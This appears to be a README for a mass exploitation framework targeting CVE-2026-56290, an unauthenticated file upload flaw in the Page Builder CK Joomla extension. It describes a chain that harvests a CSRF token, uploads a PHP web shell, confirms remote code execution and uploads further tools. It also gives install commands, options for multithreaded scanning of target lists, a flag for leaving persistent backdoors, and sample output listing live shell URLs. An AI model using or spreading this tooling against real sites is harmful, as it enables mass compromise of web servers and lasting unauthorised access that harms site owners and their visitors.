
📤 Mass exploitation framework for CVE-2026-56290 — Page Builder CK Joomla unauthenticated file upload to RCE
CVE-2026-56290 is a critical-severity vulnerability in Page Builder CK (com_pagebuilderck), a popular Joomla page builder extension. The browse.ajaxAddPicture controller method accepts unauthenticated file uploads with a user-controlled destination path, allowing attackers to write arbitrary PHP files to web-accessible directories.
// browse.php controller — NO authentication check
function ajaxAddPicture() {
$input = JFactory::getApplication()->input;
$file = $input->files->get('file', null); // ← user-controlled file
$path = trim($input->get('path', '')); // ← user-controlled path, only trim()!
// ... uploads file to $path without validating the destination
}
The path parameter undergoes only trim() sanitization — no whitelist, no directory traversal check, no authentication gate. Combined with a CSRF token that is publicly accessible from any Joomla page, attackers can remotely upload PHP shells to any writable directory.
| Vector | Severity | Impact |
|---|---|---|
| Unauthenticated File Upload | 9.8 (Critical) | Arbitrary PHP code execution |
| CSRF Token Harvesting | 5.3 (Medium) | Enables the upload chain |
| Information Disclosure | 5.3 (Medium) | Extension version fingerprinting |
1. HIT Joomla homepage → harvest CSRF token (hex32 + value "1")
2. POST file upload → task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in → media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL → code executes, RCE confirmed
5. POST f=@file to shell → upload additional tools
6. GET ?cleanup=1 → shell self-destructs
| Page Builder CK Version | Status | Notes |
|---|---|---|
| 3.1.1 and below | 🔴 Vulnerable | Confirmed unauthenticated upload |
| 3.4.10 and below | 🔴 Vulnerable | Extended range per analysis |
| 3.5.10 and below | 🔴 Vulnerable | Some patched variants may exist |
| > 3.5.10 | 🟢 Possibly Patched | Verify via manifest XML |
Note: Version is detected from the Joomla manifest file at
/administrator/manifests/files/com_pagebuilderck.xml. If the manifest is inaccessible, the scanner defaults to treating the target as potentially vulnerable.
🔍 Reconnaissance
|
💀 Exploitation
|
# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit
# Install dependencies
pip install -r requirements.txt
# Verify
python cve_2026_56290.py --help
requests>=2.28.0
urllib3>=1.26.0
CVE-2026-56290 — PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator
-t, --target Single target URL
-f, --file File with target URLs (one per line, # for comments)
-o, --output Live TXT output file (default: cve-2026-56290_live.txt)
--json JSON report file path (default: cve-2026-56290_report.json)
--threads Concurrent workers (default: 20)
--timeout Request timeout in seconds (default: 15)
--no-cleanup Leave shells on target (persistent backdoor)
-v, --verbose Verbose endpoint discovery output
--known-endpoint Skip discovery: task,file_param,folder_param
# Single target
python cve_2026_56290.py -t https://target.com
# Mass scan from file
python cve_2026_56290.py -f targets.txt
# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v
# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup
# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"
# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored
$ python cve_2026_56290.py -f targets.txt -o live_results.txt
────────────────────────────────────────────────────────────
CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
Live TXT: live_results.txt
2026-07-04 15:30:00
────────────────────────────────────────────────────────────
✅ https://target-vuln.com [rce_confirmed] 12.4s
PBCK: 3.4.7 [VULN]
RCE : ext=php | path=media/com_pagebuilderck/gfonts/
Shell: https://target-vuln.com/media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.php
Usage: POST f=@file | ?cleanup=1
EP : task=browse.ajaxAddPicture | file=file | folder=path
🛡️ https://target-patched.com [patched] 3.2s